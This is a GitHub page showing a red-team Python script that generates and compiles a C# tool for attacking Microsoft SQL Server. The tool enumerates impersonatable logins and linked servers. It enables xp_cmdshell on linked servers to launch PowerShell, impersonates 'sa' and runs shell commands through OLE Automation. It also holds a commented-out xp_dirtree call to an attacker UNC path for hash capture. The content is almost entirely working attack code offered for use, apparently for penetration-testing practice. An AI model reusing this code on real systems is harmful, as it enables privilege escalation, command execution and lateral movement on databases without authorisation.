redteam/generate_win_util_SQLClient.py at master · precurse/redteam · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
#!/bin/env python3
import ak

FN_BASE = "win_sqlclient"
FN_CS = FN_BASE + ".cs"
FN_EXE = FN_BASE + ".exe"

template = r"""
using System;
using System.Data.SqlClient;
using System.Collections.Generic;


namespace SQLClient
{
    public class Program
    {
        private static string sqlServer;
        private static string database;

	public static String executeQuery(String query, SqlConnection con) {
		SqlCommand cmd = new SqlCommand(query, con);
		SqlDataReader reader = cmd.ExecuteReader();
		try
		{
			String result = "";
			while (reader.Read() == true)
			{
				result += reader[0] + "\n";
			}
			reader.Close();
			return result;

		}
		catch
		{
			return "";
		}

        }

	public static List<string> executeQueryList(String query, SqlConnection con) {
		SqlCommand cmd = new SqlCommand(query, con);
		SqlDataReader reader = cmd.ExecuteReader();
                List<string> result = new List<string>();

		try
		{
			while (reader.Read() == true)
			{
				result.Add(reader[0].ToString());
			}
			reader.Close();
			return result;

		}
		catch
		{
			return result;
		}

        }

        public static String getLinkedServerVersion(SqlConnection con) {

        List<string> servers = executeQueryList("EXEC sp_linkedservers;", con);

        for (var i = 0; i < servers.Count; i++) {
          try {
            String query = $"select version from openquery(\"{servers[i]}\", 'select @@version as version')";
            String dbQuery = executeQuery(query, con);
            Console.WriteLine($"Linked server {servers[i]} version: {dbQuery}" );

            Console.WriteLine($"Attempting to enable advanced options on {servers[i]}" );
            query = $"select version from openquery(\"{servers[i]}\", 'sp_configure ''show advanced options'', 1;reconfigure')";
            dbQuery = executeQuery(query, con);
            Console.WriteLine($"{servers[i]} response: {dbQuery}" );

            query = $"select version from openquery(\"{servers[i]}\", 'sp_configure ''xp_cmdshell'',1;reconfigure')";
            dbQuery = executeQuery(query, con);
            Console.WriteLine($"{servers[i]} response: {dbQuery}" );

            query = $"select version from openquery(\"{servers[i]}\", 'xp_cmdshell ''powershell.exe'';')";
            dbQuery = executeQuery(query, con);
            Console.WriteLine($"{servers[i]} response: {dbQuery}" );

            query = $"EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT {servers[i]}";
            dbQuery = executeQuery(query, con);
            Console.WriteLine($"Enabled Advanced Options for server {servers[i]} response: {dbQuery}" );
          }
          catch(Exception e) {
            Console.WriteLine($"Linked server {servers[i]} error"+e );
          }

        }

        return "";
        }


        public static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("Using defaults localhost and master as database");
                sqlServer = "localhost";
                database = "master";
            } else
            {
                sqlServer = args[0];
                database = args[1];
            }

            String conString = "Server = " + sqlServer + ";Database = " + database + "; Integrated Security = True;";

            SqlConnection con = new SqlConnection(conString);
            try
            {
                con.Open();
                Console.WriteLine("Auth success! Woot");
            }
            catch
            {
                Console.WriteLine("Auth failed :(");
                Environment.Exit(0);
            }

            // Get Impersonatable users
	    String impersonate = executeQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';", con);
	    Console.WriteLine($"Logins that can be impersonated: {impersonate}" );

            // Get DB list
            String dbs = executeQuery("SELECT name FROM master.dbo.sysdatabases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');", con);
            Console.WriteLine($"Non-system DBs found:: {dbs}" );

            // Get Linked servers
	    String linked = executeQuery("EXEC sp_linkedservers;", con);
	    Console.WriteLine($"Linked Servers: {linked}" );

            getLinkedServerVersion(con);

	    String loggedin = executeQuery("SELECT USER_NAME();", con);
	    Console.WriteLine($"Logged in as: {loggedin}" );

            String querypublicrole = "SELECT IS_SRVROLEMEMBER('public');";
            SqlCommand command = new SqlCommand(querypublicrole, con);
            SqlDataReader reader = command.ExecuteReader();
            reader.Read();
            Int32 role = Int32.Parse(reader[0].ToString());

            if (role == 1)
            {
                Console.WriteLine("User is a member of public role");
            }
            else
            {
                Console.WriteLine("User is NOT a member of public role");
            }
            reader.Close();

            String executeas = "use msdb; EXECUTE AS USER = 'dbo';";
            command = new SqlCommand(executeas, con);
            reader = command.ExecuteReader(); reader.Close();


            String impersonateUser = "EXECUTE AS LOGIN = 'sa';";
            String enable_ole = "EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;";
            String execCmd = "DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'cmd /c \"echo Test > C:\\Tools\\file.txt\"';";
            command = new SqlCommand(impersonateUser, con);
            reader = command.ExecuteReader();
            reader.Close();
            command = new SqlCommand(enable_ole, con);
            reader = command.ExecuteReader();
            reader.Close();
            command = new SqlCommand(execCmd, con);
            reader = command.ExecuteReader();


            con.Close();

            //String query = "EXEC master..xp_dirtree \"\\\\192.168.49.65\\\\test\";";
            //command = new SqlCommand(query, con);
            //reader = command.ExecuteReader();

            //reader.Close();
            //con.Close();
        }}}
"""

ak.write_file(FN_CS, template)
ak.cs_compile(FN_CS, "/r:libraries/System.Data.SqlClient.dll /r:libraries/System.Data.dll")

# Command line options
# Run with OLE
# Attempt to priv esc
# Try XP_DIRTREE to LHOST
# Get list of remote hosts and execute